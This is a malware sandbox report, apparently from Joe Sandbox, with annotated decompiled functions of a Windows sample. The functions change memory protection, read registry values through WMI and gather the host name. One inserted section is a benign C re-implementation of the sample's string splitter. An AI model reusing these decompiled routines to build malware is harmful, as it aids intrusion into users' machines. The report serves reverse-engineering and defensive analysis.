                								if( *0x222a2fc <= 6) {
                									_t42 =  *0x222a348; // 0x9ad5a8
                									_t15 = _t42 + 0x222bcd2; // 0x52384549
                									E02225157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                								}
                							}
                							_t38 =  *0x222a348; // 0x9ad5a8
                							_t17 = _t38 + 0x222bbb8; // 0x2bd9160
                							_t18 = _t38 + 0x222bc1c; // 0x680043
                							_t45 = E02225B0E(_v8, 0x80000001, _t52, _t18, _t17);
                							HeapFree( *0x222a2d8, 0, _t52);
                						}
                					}
                					HeapFree( *0x222a2d8, 0, _v16);
                				}
                				_t54 = _v8;
                				if(_v8 != 0) {
                					E02227220(_t54);
                				}
                				return _t45;
                			}

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BD9218,00000000,?,74D0F710,00000000,74D0F730), ref: 022252A0
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BD9160,?,00000000,30314549,00000014,004F0053,02BD9270), ref: 0222533D
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022268B6), ref: 0222534F
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 5f27a1771ac4c582ef4f1cc1e9e27e99c3afb3859dad3f60cacafa8f6a961b0b
                • Instruction ID: b52cb1174a838df3bdff33923c2c25cc6485301b1050b250810fdc5f3c20c563
                • Opcode Fuzzy Hash: 5f27a1771ac4c582ef4f1cc1e9e27e99c3afb3859dad3f60cacafa8f6a961b0b
                • Instruction Fuzzy Hash: 3931A131910229BFDB20DBD0ED88E9E7BBDEB04704F565055F5009B124DBB39A6CDB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E004014CF(void* __eax, void* _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				long _v20;
                				int _t42;
                				long _t53;
                				intOrPtr _t56;
                				void* _t57;
                				signed int _t59;
                
                				_v12 = _v12 & 0x00000000;
                				_t56 =  *0x404180;
                				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                				_v16 =  *(__eax + 6) & 0x0000ffff;
                				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
                				_v8 = _v8 & 0x00000000;
                				if(_v16 <= 0) {
                					L12:
                					return _v12;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t59 = _v12;
                					if(_t59 != 0) {
                						goto L12;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t59 >= 0) {
                						asm("bt [esi+0x24], eax");
                						if(__eflags >= 0) {
                							L8:
                							_t53 = _t56 - 0x43175abf;
                							L9:
                							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
                							if(_t42 == 0) {
                								_v12 = GetLastError();
                							}
                							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
                							_v8 = _v8 + 1;
                							if(_v8 < _v16) {
                								continue;
                							} else {
                								goto L12;
                							}
                						}
                						asm("bt [esi+0x24], eax");
                						_t53 = _t56 - 0x43175ac1;
                						if(__eflags >= 0) {
                							goto L9;
                						}
                						goto L8;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t59 >= 0) {
                						_t53 = _t56 - 0x43175aa3;
                					} else {
                						_t53 = _t56 - 0x43175a83;
                					}
                					goto L9;
                				}
                				goto L12;
                			}

                APIs
                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                • GetLastError.KERNEL32 ref: 00401583
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLast
                • String ID:
                • API String ID: 1469625949-0
                • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			// Splits the space-separated string _a4 into an array of char* and returns the array
                			// through *_a8. The input is modified in place (each separator becomes a NUL). Always
                			// returns 0: no element count is returned and no terminating entry is written, so the
                			// caller must obtain the count some other way.
                			E022212C6(char* _a4, char** _a8) {
                				char* _t7;
                				char* _t11;
                				char* _t14;
                				char* _t16;
                				char* _t17;
                				char _t18;
                				signed int _t20;
                				signed int _t22;
                
                				_t16 = _a4;
                				_push(0x20);
                				_t20 = 1;
                				_push(_t16);
                				// Pass 1: upper bound on the token count = number of 0x20 bytes + 1, taken before trimming.
                				while(1) {
                					_t7 = StrChrA();
                					if(_t7 == 0) {
                						break;
                					}
                					_t20 = _t20 + 1;
                					_push(0x20);
                					_push( &(_t7[1]));
                				}
                				_t11 = E022233DC(_t20 << 2); // count * sizeof(char*) bytes from the private heap (E022233DC wraps RtlAllocateHeap)
                				_a4 = _t11;
                				if(_t11 != 0) {
                					StrTrimA(_t16, 0x2229278); // executed; strips the characters of the string at 0x2229278 (not shown in this listing) from both ends
                					_t22 = 0;
                					// Pass 2: cut at each 0x20 and skip the run of 0x20/0x09 that follows it. Only 0x20
                					// starts a new token, so a tab that is not preceded by a space stays inside its token.
                					do {
                						_t14 = StrChrA(_t16, 0x20);
                						if(_t14 != 0) {
                							 *_t14 = 0;
                							do {
                								_t14 =  &(_t14[1]);
                								_t18 =  *_t14;
                							} while (_t18 == 0x20 || _t18 == 9);
                						}
                						_t17 = _a4;
                						 *(_t17 + _t22 * 4) = _t16; // store the token pointer
                						_t22 = _t22 + 1;
                						_t16 = _t14;
                					} while (_t14 != 0);
                					 *_a8 = _t17;
                				}
                				return 0;
                			}











                Listing address range: 0x022212ca to 0x0222133d

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,02BD95FC,?,?,022253AF,?,02BD95FC), ref: 022212E2
                • StrTrimA.KERNELBASE(?,02229278,00000002,?,022253AF,?,02BD95FC), ref: 02221300
                • StrChrA.SHLWAPI(?,00000020,?,022253AF,?,02BD95FC), ref: 0222130B
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: c10a2713654771eb0bd7a987401292d0c2220b1112f0d41e8536342dc8319bef
                • Instruction ID: fc7f40ba172b9c1aea5c5b4e9885c8aac40c2c93b7aea02397bdcc4ab3fd881e
                • Opcode Fuzzy Hash: c10a2713654771eb0bd7a987401292d0c2220b1112f0d41e8536342dc8319bef
                • Instruction Fuzzy Hash: FF01B1717203667EEB204AAACD48FA77B8EEBC5254F041011B949CF296D6B2C855C660
                Uniqueness

                Uniqueness Score: -1.00%
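The following is an added example, not code from the sample or from this Joe Sandbox report: a portable C re-implementation of E022212C6 (the listing above), so that an analyst can check how a given configuration string is split, including the two behaviours the decompiled loop implies (a tab only separates tokens when a space precedes it; no count or terminator is returned). StrChrA, StrTrimA and the private-heap allocator E022233DC are replaced by libc calls; the trim set is assumed to be " \t" because the string at 0x2229278 does not appear in the listing; the input in main() is constructed.

```c
/*
 * Added example (not code from the sample or from this report): a portable
 * re-implementation of E022212C6, the space-separated list splitter decompiled
 * above, so its behaviour can be checked on constructed input. StrChrA,
 * StrTrimA and the sample's private-heap allocator are replaced by libc calls.
 * ASSUMPTION: the trim set (the string at 0x2229278, not shown in the listing)
 * is " \t".
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const char TRIM_SET[] = " \t";   /* assumed contents of the string at 0x2229278 */

/*
 * Splits `s` in place at 0x20 bytes, following the decompiled routine:
 *   pass 1  counts 0x20 bytes before trimming to size the pointer array;
 *   trim    removes TRIM_SET characters from both ends;
 *   pass 2  NUL-terminates each token at the next 0x20 and skips the run of
 *           0x20/0x09 that follows it (a tab not preceded by a space is kept
 *           inside its token, because only 0x20 is searched for).
 * Returns a calloc'd array of token pointers, or NULL if allocation fails.
 * The original returns neither a count nor a terminator; *count is added here
 * for the caller's benefit and unused slots are left NULL by calloc.
 */
char **split_spaces(char *s, size_t *count)
{
    size_t slots = 1;
    for (const char *p = strchr(s, ' '); p != NULL; p = strchr(p + 1, ' '))
        slots++;

    char **argv = calloc(slots, sizeof *argv);   /* original: heap alloc of slots * 4 */
    if (argv == NULL)
        return NULL;

    /* StrTrimA(s, TRIM_SET) */
    size_t len = strlen(s);
    while (len > 0 && strchr(TRIM_SET, s[len - 1]) != NULL)
        s[--len] = '\0';
    size_t lead = strspn(s, TRIM_SET);
    if (lead > 0)
        memmove(s, s + lead, len - lead + 1);

    size_t n = 0;
    char *tok = s;
    do {
        char *sp = strchr(tok, ' ');
        if (sp != NULL) {
            *sp = '\0';
            do {
                sp++;
            } while (*sp == ' ' || *sp == '\t');
        }
        argv[n++] = tok;
        tok = sp;
    } while (tok != NULL);

    *count = n;
    return argv;
}

int main(void)
{
    /* constructed input, not taken from the sample */
    char input[] = "  user  admin \t svc ";
    size_t n = 0;
    char **v = split_spaces(input, &n);
    if (v == NULL)
        return 1;
    for (size_t i = 0; i < n; i++)
        printf("[%zu] \"%s\"\n", i, v[i]);
    free(v);
    return 0;
}
```

Compile with any C99 compiler; main() prints the tokens of the constructed input. Keep in mind that the original allocates (spaces + 1) pointer slots without a terminator, so when consecutive spaces collapse, the trailing slots hold whatever the heap allocator left there.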

                C-Code - Quality: 75%
                			// Generic WMI method invocation. _a4 points to a pair {IWbemServices*, IWbemClassObject* class};
                			// _a16 is the method name, _a8/_a12/_a20 are values for the input parameters (filled in by
                			// E02224358), _a24 names one parameter and _a28 is an in/out VARIANT for it: a non-empty
                			// VARIANT is Put into the input object before the call, an empty one is filled from the
                			// output object afterwards. The vtable offsets used below match the wbemcli.h layouts:
                			// IWbemClassObject +0x4c GetMethod, +0x14 Put, +0x10 Get, +0x8 Release; IWbemServices +0x60 ExecMethod.
                			E0222790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                				void* _v8;
                				void* __esi;
                				intOrPtr* _t35;
                				void* _t40;
                				intOrPtr* _t41;
                				intOrPtr* _t43;
                				intOrPtr* _t45;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				void* _t54;
                				intOrPtr* _t55;
                				intOrPtr* _t57;
                				intOrPtr* _t61;
                				intOrPtr* _t65;
                				intOrPtr _t68;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                
                				_t55 = _a4;
                				_t35 =  *((intOrPtr*)(_t55 + 4)); // class object
                				_a4 = 0;
                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx); // GetMethod(name, 0, &in-parameter object, NULL)
                				if(_t76 < 0) {
                					L18:
                					return _t76;
                				}
                				_t40 = E02224358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed; fills the input parameters and returns the BSTRs it allocated in _a20/_a12 (freed below)
                				_t76 = _t40;
                				if(_t76 >= 0) {
                					_t61 = _a28;
                					if(_t61 != 0 &&  *_t61 != 0) { // VARIANT.vt != VT_EMPTY: caller-supplied input value
                						_t52 = _v8;
                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0); // Put(_a24, 0, &VARIANT, 0)
                					}
                					if(_t76 >= 0) {
                						_t43 =  *_t55; // IWbemServices
                						_t68 =  *0x222a348; // 0x9ad5a8  (relocation base added to the embedded string offsets)
                						_t20 = _t68 + 0x222b270; // 0x740053  object path; first UTF-16 characters 'S','t' (consistent with StdRegProv, which the report's registry-via-WMI signatures point to; not confirmed by this listing)
                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0); // ExecMethod(path, name, 0, NULL, in = _v8, &out = _a4, NULL)
                						if(_t76 >= 0) {
                							_t76 = E02224984(_a4); // inspects the output object (body not in this listing)
                							if(_t76 >= 0) {
                								_t65 = _a28;
                								if(_t65 != 0 &&  *_t65 == 0) { // VARIANT.vt == VT_EMPTY: read the parameter back
                									_t50 = _a4;
                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0); // Get(_a24, 0, &VARIANT, NULL, NULL)
                								}
                							}
                						}
                						_t45 = _a4;
                						if(_t45 != 0) {
                							 *((intOrPtr*)( *_t45 + 8))(_t45); // Release() on the output object
                						}
                						_t57 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString (see APIs below)
                						if(_a20 != 0) {
                							 *_t57(_a20);
                						}
                						if(_a12 != 0) {
                							 *_t57(_a12);
                						}
                					}
                				}
                				_t41 = _v8;
                				 *((intOrPtr*)( *_t41 + 8))(_t41); // Release() on the input object
                				goto L18;
                			}





















                Listing address range: 0x02227911 to 0x02227a05

                APIs
                  • Part of subcall function 02224358: SysAllocString.OLEAUT32(80000002), ref: 022243B5
                  • Part of subcall function 02224358: SysFreeString.OLEAUT32(00000000), ref: 0222441B
                • SysFreeString.OLEAUT32(?), ref: 022279EA
                • SysFreeString.OLEAUT32(02224D42), ref: 022279F4
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: aa6bcfa34ef56a09cb24cfa3057b10a1a4da83518ac65b26e3cd8810e4434d99
                • Instruction ID: 56e207d159377fbf8bc415a3bb769759c2b8776759ea6f77ff8b1643f9a2e3d9
                • Opcode Fuzzy Hash: aa6bcfa34ef56a09cb24cfa3057b10a1a4da83518ac65b26e3cd8810e4434d99
                • Instruction Fuzzy Hash: 54314C72500259BFCB21DFA8C888C9BBB7AFB8D7447144658F805AB214D7329D55CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Thread routine: the value passed to ExitThread is the thread's exit code (0xb on failure).
                			E0040139F() {
                				char _v16;
                				intOrPtr _v28;
                				void _v32;
                				void* _v36;
                				intOrPtr _t15;
                				void* _t16;
                				void* _t24;
                				long _t25;
                				int _t26;
                				void* _t30;
                				intOrPtr* _t32;
                				signed int _t35;
                				intOrPtr _t38;
                
                				_t15 =  *0x404184;
                				if( *0x40416c > 5) { // selects one of two embedded strings by the global at 0x40416c (threshold 5)
                					_t16 = _t15 + 0x40513c;
                				} else {
                					_t16 = _t15 + 0x40529c;
                				}
                				E00401D3C(_t16, _t16); // converts the chosen SDDL string into a security descriptor (see E00401D3C below)
                				_t35 = 6;
                				memset( &_v32, 0, _t35 << 2); // zeroes a 24-byte structure
                				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed; key = global at 0x404180 XOR 0xdd0210cf
                				if(_t24 == 0) {
                					_t25 = 0xb; // 0xb = ERROR_BAD_FORMAT
                				} else {
                					_t26 = lstrlenW( *0x404178); // wide string at 0x404178
                					_t8 = _t26 + 2; // 0x2
                					_t11 = _t26 + _t8 + 8; // 0xa  = 2*len + 10 bytes: a 4-byte header, the wide string copy with terminator, and slack
                					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed; _v36 receives the buffer
                					if(_t30 == 0) {
                						_t32 = _v36;
                						 *_t32 = 0; // header DWORD
                						if( *0x404178 == 0) {
                							 *((short*)(_t32 + 4)) = 0; // empty wide string
                						} else {
                							L00401FE6(_t32 + 4); // presumably copies the string at 0x404178 after the header (body not in this listing)
                						}
                					}
                					_t25 = E004012FB(_v28); // executed
                				}
                				ExitThread(_t25);
                			}
















                Listing address range: 0x004013a5 to 0x00401452

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ExitThreadlstrlen
                • String ID:
                • API String ID: 2636182767-0
                • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
                • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071B57D
                • Module32First.KERNEL32(00000000,00000224), ref: 0071B59D
                Memory Dump Source
                • Source File: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Offset: 00716000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_716000_server.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: db51e9fa5892a121b410347c5c128366f9a2de17e4a45ef98b22b97577e8d7f5
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 01F0C235600310ABD7202BBCA88CAAE76EDAF48724F100528E642910C0DB78ED958A60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			// Returns a heap copy of the computer's DNS fully-qualified name, or 0 on failure.
                			// Two-call pattern: a size query with a NULL buffer, then the real call into a buffer of that size + 1.
                			E0222472F(void* __ecx) {
                				signed int _v8;
                				void* _t15;
                				void* _t19;
                				void* _t20;
                				void* _t22;
                				intOrPtr* _t23;
                
                				_t23 = __imp__; // GetComputerNameExA (see APIs below)
                				_t20 = 0;
                				_v8 = _v8 & 0; // nSize = 0
                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed; GetComputerNameExA(ComputerNameDnsFullyQualified, NULL, &size) fails and stores the required size
                				_t10 = _v8;
                				if(_v8 != 0) {
                					_t20 = E022233DC(_t10 + 1); // private-heap allocation, +1 for the terminator
                					if(_t20 != 0) {
                						_t15 =  *_t23(3, _t20,  &_v8); // executed; second call fills the buffer and updates _v8 with the length
                						if(_t15 != 0) {
                							 *((char*)(_v8 + _t20)) = 0; // explicit NUL at the returned length
                						} else {
                							E022261DA(_t20); // RtlFreeHeap wrapper (see below)
                							_t20 = 0;
                						}
                					}
                				}
                				return _t20;
                			}









                Listing address range: 0x02224734 to 0x02224780

                APIs
                • GetComputerNameExA.KERNELBASE(00000003,00000000,02223DCD,00000000,00000000,?,7491C740,02223DCD), ref: 02224747
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetComputerNameExA.KERNELBASE(00000003,00000000,02223DCD,02223DCE,?,7491C740,02223DCD), ref: 02224764
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: 55a5d8c7f4c2f964d934b9cef7afed024d8d3f9dfb2c6af5f52d2c02cf9d03e2
                • Instruction ID: 7c3cbd055cbc8e5eeacad93eaf6fdb14285b556a8e68846cd58b19f6c998cb0e
                • Opcode Fuzzy Hash: 55a5d8c7f4c2f964d934b9cef7afed024d8d3f9dfb2c6af5f52d2c02cf9d03e2
                • Instruction Fuzzy Hash: 19F0B436A2022AFAEB11E6EA8C00EEF36BDDBC5644F110065B914D3144EB71DB09C670
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			// Runtime initialisation: creates the private heap that E022233DC/E022261DA use (handle at
                			// 0x222a2d8), records the start tick count and runs the setup chain. Returns 8
                			// (ERROR_NOT_ENOUGH_MEMORY) when the heap cannot be created.
                			E02225006(signed int __edx, intOrPtr _a4) {
                				void* _t3;
                				void* _t5;
                				void* _t7;
                				void* _t8;
                				void* _t9;
                				signed int _t10;
                
                				_t10 = __edx;
                				_t3 = HeapCreate(0, 0x400000, 0); // executed; serialised private heap, 4 MB initial size, no maximum (growable)
                				 *0x222a2d8 = _t3;
                				if(_t3 == 0) {
                					_t8 = 8;
                					return _t8;
                				}
                				 *0x222a1c8 = GetTickCount(); // start time
                				_t5 = E022254D8(_a4);
                				if(_t5 == 0) {
                					_t5 = E0222213E(_t9, _a4); // executed
                					if(_t5 == 0) {
                						if(E02226392(_t9) != 0) {
                							 *0x222a300 = 1; // executed; flag recorded when E02226392 succeeds
                						}
                						_t7 = E02222523(_t10); // executed
                						return _t7;
                					}
                				}
                				return _t5;
                			}









                Listing address range: 0x02225006 to 0x02225060

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000,0222107E,?), ref: 0222500F
                • GetTickCount.KERNEL32 ref: 02225023
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: 34984ab29eb2dfe091d43659b19fe3b02a0d72c2a320c722306bf6945cecaf39
                • Instruction ID: 3921283337fca93bd59ac360036f45cbb26201b2c06be0e786044eb1c4c6240f
                • Opcode Fuzzy Hash: 34984ab29eb2dfe091d43659b19fe3b02a0d72c2a320c722306bf6945cecaf39
                • Instruction Fuzzy Hash: C0F06D30AA0336FADB352BF0AD19B2535D56B08B04FA0C925E901D8098EBB3D57C9E61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNELBASE(00000400,?,?,00500223,?,?), ref: 00500E19
                • SetErrorMode.KERNELBASE(00000000,?,?,00500223,?,?), ref: 00500E1E
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                • Instruction ID: 0d446c16eae7c208faf0d57bd6344f7191849366e1e2b515b91accd1c8e4ec86
                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                • Instruction Fuzzy Hash: C6D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DE90C0C770994046E5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			// Reads one string-typed parameter back from a WMI method call made through E0222790B and
                			// returns a heap copy of it through *_a16. Returns 0 on success, 1 when the result is not a
                			// BSTR, 8 when the copy could not be allocated, and the failing HRESULT from E0222790B otherwise.
                			E02222839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v12;
                				void* _v18;
                				char _v20;
                				intOrPtr _t15;
                				void* _t17;
                				intOrPtr _t19;
                				void* _t23;
                
                				_v20 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw"); // together with _v20 = 0 this zeroes the 16-byte VARIANT at &_v20 (vt = VT_EMPTY), so E0222790B reads the parameter from the output object
                				_t15 =  *0x222a348; // 0x9ad5a8  (relocation base added to the embedded string offsets)
                				_t4 = _t15 + 0x222b3e8; // 0x2bd8990  name of the parameter to read back
                				_t20 = _t4;
                				_t6 = _t15 + 0x222b174; // 0x650047  method name; first UTF-16 characters 'G','e'
                				_t17 = E0222790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed; 0x80000002 = HKEY_LOCAL_MACHINE, _a8 and _a12 go to the input parameters
                				if(_t17 < 0) {
                					_t23 = _t17;
                				} else {
                					_t23 = 8; // VT_BSTR
                					if(_v20 != _t23) { // VARIANT.vt (low WORD)
                						_t23 = 1;
                					} else {
                						_t19 = E0222661C(_t20, _v12); // _v12 = VARIANT.bstrVal (offset 8); E0222661C makes a heap copy (lstrlenW/memcpy/memset, see APIs below)
                						if(_t19 != 0) {
                							 *_a16 = _t19;
                							_t23 = 0;
                						}
                						__imp__#6(_v12); // SysFreeString (OLEAUT32 ordinal 6)
                					}
                				}
                				return _t23;
                			}










                Listing address range: 0x02222843 to 0x022228b0

                APIs
                  • Part of subcall function 0222790B: SysFreeString.OLEAUT32(?), ref: 022279EA
                  • Part of subcall function 0222661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02224B72,004F0053,00000000,?), ref: 02226625
                  • Part of subcall function 0222661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02224B72,004F0053,00000000,?), ref: 0222664F
                  • Part of subcall function 0222661C: memset.NTDLL ref: 02226663
                • SysFreeString.OLEAUT32(00000000), ref: 0222289C
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: 7b299467c1191aa44f5753ce3dc9cfb7aa030f959e0af23ba158f211b26fedf4
                • Instruction ID: 6021a40ccc2a5895fed316193ac23a39e746310158aecccf12be605bb251a838
